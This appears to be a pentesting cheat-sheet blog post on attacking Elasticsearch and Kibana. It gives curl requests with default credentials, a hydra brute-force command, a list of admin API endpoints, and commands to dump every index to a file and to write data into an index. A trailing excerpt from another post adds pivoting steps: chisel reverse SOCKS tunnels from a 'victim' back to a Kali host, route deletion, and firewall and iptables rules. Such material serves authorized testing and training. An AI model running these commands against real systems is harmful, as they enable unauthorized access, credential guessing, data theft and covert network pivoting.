Skip to main content

Pentesting Kibana, Elastic Search - Port 5601, 9200

 

#Service Name and Version info - if no info is displayed, requires Auth
curl 10.10.10.10:9200/

#Default Creds
curl -X GET http://admin:elasticadmin@10.10.10.10:9200/
curl -X GET http://elastic:changeme@10.10.10.10:9200/

#Bruteforce Creds
hydra -L usernames.txt -P passwords.txt <target-ip> -s 9200 http-get /

ALL PATHS

_cat/_cluster/_security

/_cat/segments

/_cluster/allocation/explain

/_security/user

/_cat/shards

/_cluster/settings

/_security/privilege

/_cat/repositories

/_cluster/health

/_security/role_mapping

/_cat/recovery

/_cluster/state

/_security/role

/_cat/plugins

/_cluster/stats

/_security/api_key

/_cat/pending_tasks

/_cluster/pending_tasks

/_cat/nodes

/_nodes

/_cat/tasks

/_nodes/usage

/_cat/templates

/_nodes/hot_threads

/_cat/thread_pool

/_nodes/stats

/_cat/ml/trained_models

/_tasks

/_cat/transforms/_all

/_remote/info

/_cat/aliases

/_cat/allocation

/_cat/ml/anomaly_detectors

/_cat/count

/_cat/ml/data_frame/analytics

/_cat/ml/datafeeds

/_cat/fielddata

/_cat/health

/_cat/indices

/_cat/master

/_cat/nodeattrs

/_cat/nodes


#List all Indexes
curl 10.10.10.10:9200/_cat/indices?v

#Access an Index
curl 10.10.10.10:9200/<Index_name>

#Dump Everything
curl http://10.10.10.10:9200/_search?pretty=true > Elastic_Search.dump

#Add Data to an Index
curl -X POST '10.10.10.10:9200/Index_Name/Object_Name' -H 'Content-Type: application/json' -d'
 {
    "id" : "1",
    "name" : "ab",
    "lastname" : "aa",
    "Comment" : "info"
 }'



Comments

Popular posts from this blog

Pivoting into an internal network behind firewall

    Accessing a Victim network from Windows box which is pivoted to Kali #On Kali sshuttle --listen 0.0.0.0 -r user@10.10.10.10 192.168.1.0/24 or ./chisel server --port 9001 -reverse #On Victim ./chisel.exe client 10.10.10.1:9001 R:0.0.0.0:1080:socks .\chisel.exe client 10.10.10.1:9001 R:8080:127.0.0.1:8080 R:8888:127.0.0.1:8888 R:9090:127.0.0.1:9090 #On windows route print #delete default route route delete 0.0.0.0 #add a new route to kali- setting kali ip as gateway; kali_ip=which is on the same subnet as the windows box route add 0.0.0.0 mask 0.0.0.0 KALI_IP #Now you should be able to access all the sites which are accessible on kali from windows box. #If the above doesnt work #asuming Kali and windows are on Eht0 #add a firewall rule to allow Kali ip traffic netsh advfirewall firewall add rule name="Allow VPN Traffic" dir=in action=allow protocol=any remoteip=KALI_ETH0_IP #on Kali - Allow tun0 traffic to forward on iptables sudo iptables -P FORWARD ACCEPT ...